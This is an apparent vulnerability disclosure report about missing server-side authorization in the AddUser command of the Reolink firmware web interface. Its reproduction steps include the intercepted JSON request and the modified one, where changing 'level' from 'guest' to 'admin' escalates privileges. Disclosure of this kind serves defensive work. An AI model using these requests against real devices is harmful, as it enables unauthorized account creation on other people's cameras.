1. Reporting information

• Team name : Team Brrester

2. Overview of Vulnerabilities

• Vulnerability title: A level 1 account can be created due to insufficient privilege verification

• Date of discovery: 2025.07.05

• Discovery Location (URL or System Path) :

  Reolink Firmware Web ( Cmd → Adduser )

• Vulnerability Type (CWE ID):

  • CWE-862: Missing Authorization
  • CWE-285: Improper Authorization
  • CWE-639: Authorization Bypass Through User-Controlled Key

• Vulnerability Description: When a user with level 1 privileges creates another user's account, it should be able to create it with level 0 privileges, but this is a vulnerability that can be arbitrarily created with level 1 privileges. This is because it reflects the value of the level parameter delivered by the client without proper verification of the account privileges on the server side, which allows an attacker to create an administrator account through privilege escalation.

3. Details

• Impacted Products/Services: Reolink Firmware Web Interface

• Product version: firmware v3.0.0.4662_2503122283

• Vulnerable Components:

  In the user account creation logic of Reolink's firmware API, the level parameter sent by the client is not properly validated against the user's actual permission level, allowing privilege escalation.

• Account Privilege Levels:

  

  • level 2
    • Default admin account provided by Reolink.
  • level 1
    • If a user is created with userType: Administrator, the new account gets level 1.
    • Has access to most features, but cannot manage (create/delete/change password) accounts of the same or higher level.
  • level 0
    • If a user is created with userType: User, it is assigned level 0.
    • Can only view or download footage.

• Attack Vector

As you can see in the photo above, users with level1 privileges can create only accounts with level0 privileges by default.

However, if an attacker arbitrarily changes the value of the level parameter from guest to admin when requesting account creation,

The server handles the request without validating it properly, allowing the level1 privileges user to create an account with level1 privileges.

• Reproduction Steps

  1. Log in as a user with level 1 privileges.
  2. Intercept a AddUser request using a proxy tool such as Burp Suite.
  3. Observe a normal request:

  [
    {
      "cmd": "AddUser",
      "action": 0,
      "param": {
        "User": {
          "userName": "notadmin",
          "password": "1234Qwer!",
          "level": "guest"
        }
      }
    }
  ]
  
  

  1. Modify the level value from "guest" to "admin":

  [
    {
      "cmd": "AddUser",
      "action": 0,
      "param": {
        "User": {
          "userName": "notadmin",
          "password": "1234Qwer!",
          "level": "admin"
        }
      }
    }
  ]
  
  

  1. Send the modified request to the server.
  2. Confirm that the account is successfully created with level 1 privileges.
  3. Log in using the new account to verify its elevated privileges.

• POC